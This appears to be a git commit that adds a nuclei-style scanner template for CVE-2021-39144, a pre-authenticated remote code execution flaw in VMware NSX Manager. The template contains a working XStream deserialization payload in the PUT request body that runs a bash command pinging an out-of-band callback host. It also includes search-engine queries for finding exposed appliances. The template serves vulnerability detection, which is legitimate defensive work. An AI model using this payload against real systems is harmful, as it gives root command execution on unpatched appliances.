VMware NSX Manager XStream Pre-authenticated RCE (#6295)

* Added CVE-2022-37042 Template * misc updates * Added vmware-nsx-stream-rce Template * Update vmware-nsx-stream-rce.yaml * misc update * added fofa query * Update and rename vulnerabilities/vmware/vmware-nsx-stream-rce.yaml to cves/2021/CVE-2021-39144.yaml * Update CVE-2021-39144.yaml * Update CVE-2021-39144.yaml * Update and rename cves/2021/CVE-2021-39144.yaml to vulnerabilities/vmware/vmware-nsx-stream-rce.yaml * Update vmware-nsx-stream-rce.yaml * Update vmware-nsx-stream-rce.yaml * format update Co-authored-by: sandeep <sandeep@projectdiscovery.io> Co-authored-by: Dhiyaneshwaran <leedhiyanesh@gmail.com> Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>
2022-12-11 18:19:35 +08:00 · 2022-12-11 18:19:35 +08:00 · 1574d7d589
parent 74c4049363
commit 1574d7d589
2 changed files with 74 additions and 1 deletions
--- a/cves/2022/CVE-2022-37042.yaml
+++ b/cves/2022/CVE-2022-37042.yaml
@ -50,4 +50,4 @@ requests:
          - "contains(body_2,'NcbWd0XGajaWS4DmOvZaCkxL1aPEXOZu')"
        condition: and

-# Enhanced by mp on 2022/10/06
+# Enhanced by mp on 2022/10/06
--- a/vulnerabilities/vmware/vmware-nsx-stream-rce.yaml
+++ b/vulnerabilities/vmware/vmware-nsx-stream-rce.yaml
@ -0,0 +1,73 @@
+id: vmware-nsx-stream-rce
+
+info:
+  name: VMware NSX Manager XStream Pre-authenticated Remote Code Execution
+  author: _0xf4n9x_
+  severity: high
+  description: |
+    VMware Cloud Foundation (NSX-V) contains a remote code execution vulnerability via XStream open source library.
+    VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.
+    Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V),
+    a malicious actor can get remote code execution in the context of 'root' on the appliance.
+    VMware Cloud Foundation 3.x and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13
+    are vulnerable to Remote Command Injection.
+  reference:
+    - https://www.vmware.com/security/advisories/VMSA-2022-0027.html
+    - https://kb.vmware.com/s/article/89809
+    - https://srcincite.io/blog/2022/10/25/eat-what-you-kill-pre-authenticated-rce-in-vmware-nsx-manager.html
+    - https://attackerkb.com/topics/ngprN6bu76/cve-2021-39144
+    - https://github.com/rapid7/metasploit-framework/pull/17222
+  metadata:
+    verified: true
+    shodan-query: title:"VMware Appliance Management"
+    fofa-query: title="VMware Appliance Management"
+  tags: vmware,xstream,rce
+
+variables:
+  lowerrstr: "{{to_lower(rand_text_alpha(6))}}"
+
+requests:
+  - raw:
+      - |-
+        PUT /api/2.0/services/usermgmt/password/{{lowerrstr}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/xml
+
+        <sorted-set>
+          <string>foo</string>
+          <dynamic-proxy>
+            <interface>java.lang.Comparable</interface>
+            <handler class="java.beans.EventHandler">
+              <target class="java.lang.ProcessBuilder">
+                <command>
+                  <string>bash</string>
+                  <string>-c</string>
+                  <string>ping {{os}}.{{interactsh-url}}</string>
+                </command>
+              </target>
+              <action>start</action>
+            </handler>
+          </dynamic-proxy>
+        </sorted-set>
+
+    payloads:
+      os:
+        - '-c 3 lin'
+        - '-n 3 win'
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
+      - type: word
+        part: body
+        words:
+          - 'deceptive request routing'
+
+      - type: status
+        status:
+          - 400